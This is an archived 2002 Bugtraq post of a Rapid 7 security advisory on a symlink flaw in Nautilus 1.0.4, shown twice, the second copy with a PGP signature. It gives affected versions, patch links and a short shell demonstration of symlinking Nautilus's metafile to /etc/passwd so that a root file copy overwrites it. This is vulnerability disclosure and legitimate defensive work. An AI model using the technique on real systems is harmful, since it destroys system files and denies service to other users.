8382493 2002-05-02 16:13 -0400 /140 rader/ Joe Testa <jtesta@rapid7.com> Sänt av: joel@lysator.liu.se Importerad: 2002-05-02 23:57 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <22155> Ärende: R7-0003: Nautilus Symlink Vulnerability ------------------------------------------------------------ From: Joe Testa <jtesta@rapid7.com> To: bugtraq@securityfocus.com Message-ID: <3CD19DFE.2020404@rapid7.com> [ My mail client, Mozilla 1.0 RC1, mangles this advisory and ruins the signature. See attached file for signed version.] _______________________________________________________________________ Rapid 7, Inc. Security Advisory Visit http://www.rapid7.com/ to download NeXpose(tm), our advanced vulnerability scanner. Linux and Windows 2000 versions are available now! _______________________________________________________________________ Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability Published: 05/02/2002 Revision: 1.0 CVE ID: CAN-2002-0157 Bugtraq ID: 4373 1. Affected system(s): KNOWN VULNERABLE: o Nautilus 1.0.4 Apparently NOT VULNERABLE: 2. Summary Nautilus is a graphical shell for GNOME. It contains a vulnerability which would allow a malicious user to mount a symlink attack to overwrite another user's files. 3. Vendor status and information Nautilus Eazel, Inc. http://nautilus.eazel.com/ The Nautilus team was notified on 03/26/2002. 4. Solution Upgrade to the latest version of Nautilus, available at http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate patch: RedHat 7.2: SRPMS: ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm i386: ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm ia64: ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm Slackware: ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/ 5. Detailed analysis When copying files from one directory to another, Nautilus creates a small (88+ bytes) XML file called '.nautilus-metafile.xml' in the target directory. It does not check if a symlink with the same name already exists there, and blindly writes XML data to it. The following example shows how to cause a system-wide denial of service attack with this vulnerability: [jdog@imisshogs jdog]$ pwd /home/jdog [jdog@imisshogs jdog]$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...snip...] jdog:x:500:500::/home/jdog:/bin/bash [jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml [jdog@imisshogs jdog]$ mail root Subject: Yo. Could you please copy "creepy-in-new-york.doc" to my home directory (/home/jdog)? Thanks. - Joe Cc: [jdog@imisshogs jdog]$ sleep 86400 [jdog@imisshogs jdog]$ ls -l *.doc -rw-r--r-- 1 root root 13 Mar 24 18:09 creepy-in-new-york.doc [jdog@imisshogs jdog]$ cat /etc/passwd <?xml version="1.0"?> <directory> <file name="creepy-in-new-york.doc" icon_position="55,105"/> </directory> [jdog@imisshogs jdog]$ 6. Contact Information Rapid 7 Security Advisories Email: advisory@rapid7.com Web: http://www.rapid7.com/ Phone: +1 (212) 558-8700 7. Disclaimer and Copyright Rapid 7, Inc. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is hereby granted to redistribute this advisory in electronic media only, providing that no changes are made and that the copyright notices and disclaimers remain intact. This advisory may not be printed or distributed in non-electronic media without the express written permission of Rapid 7, Inc. (8382493) /Joe Testa <jtesta@rapid7.com>/-(Ombruten) Bilaga (text/plain) i text 8382495 Kommentar i text 8382510 av Exportören 8382495 2002-05-02 16:13 -0400 /142 rader/ Joe Testa <jtesta@rapid7.com> Bilagans filnamn: "nautilus_03_26_2002.asc" Importerad: 2002-05-02 23:57 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <22156> Bilaga (text/plain) till text 8382493 Ärende: Bilaga (nautilus_03_26_2002.asc) till: R7-0003: Nautilus Symlink Vulnerability ------------------------------------------------------------ -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Rapid 7, Inc. Security Advisory Visit http://www.rapid7.com/ to download NeXpose(tm), our advanced vulnerability scanner. Linux and Windows 2000 versions are available now! _______________________________________________________________________ Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability Published: 05/02/2002 Revision: 1.0 CVE ID: CAN-2002-0157 Bugtraq ID: 4373 1. Affected system(s): KNOWN VULNERABLE: o Nautilus 1.0.4 Apparently NOT VULNERABLE: 2. Summary Nautilus is a graphical shell for GNOME. It contains a vulnerability which would allow a malicious user to mount a symlink attack to overwrite another user's files. 3. Vendor status and information Nautilus Eazel, Inc. http://nautilus.eazel.com/ The Nautilus team was notified on 03/26/2002. 4. Solution Upgrade to the latest version of Nautilus, available at http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate patch: RedHat 7.2: SRPMS: ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm i386: ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm ia64: ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm Slackware: ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/ 5. Detailed analysis When copying files from one directory to another, Nautilus creates a small (88+ bytes) XML file called '.nautilus-metafile.xml' in the target directory. It does not check if a symlink with the same name already exists there, and blindly writes XML data to it. The following example shows how to cause a system-wide denial of service attack with this vulnerability: [jdog@imisshogs jdog]$ pwd /home/jdog [jdog@imisshogs jdog]$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...snip...] jdog:x:500:500::/home/jdog:/bin/bash [jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml [jdog@imisshogs jdog]$ mail root Subject: Yo. Could you please copy "creepy-in-new-york.doc" to my home directory (/home/jdog)? Thanks. - Joe Cc: [jdog@imisshogs jdog]$ sleep 86400 [jdog@imisshogs jdog]$ ls -l *.doc -rw-r--r-- 1 root root 13 Mar 24 18:09 creepy-in-new-york.doc [jdog@imisshogs jdog]$ cat /etc/passwd <?xml version="1.0"?> <directory> <file name="creepy-in-new-york.doc" icon_position="55,105"/> </directory> [jdog@imisshogs jdog]$ 6. Contact Information Rapid 7 Security Advisories Email: advisory@rapid7.com Web: http://www.rapid7.com/ Phone: +1 (212) 558-8700 7. Disclaimer and Copyright Rapid 7, Inc. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is hereby granted to redistribute this advisory in electronic media only, providing that no changes are made and that the copyright notices and disclaimers remain intact. This advisory may not be printed or distributed in non-electronic media without the express written permission of Rapid 7, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE80XI+cL76DCfug6wRAjlQAJ0RnxZ7j/ZAHj2gwYk2roTsuGZrXgCfX2HE agX4Q4yXM22ZTN0Tm0SVH3U= =N4z5 -----END PGP SIGNATURE----- (8382495) /Joe Testa <jtesta@rapid7.com>/-(Ombruten) Kommentar i text 8382511 av Exportören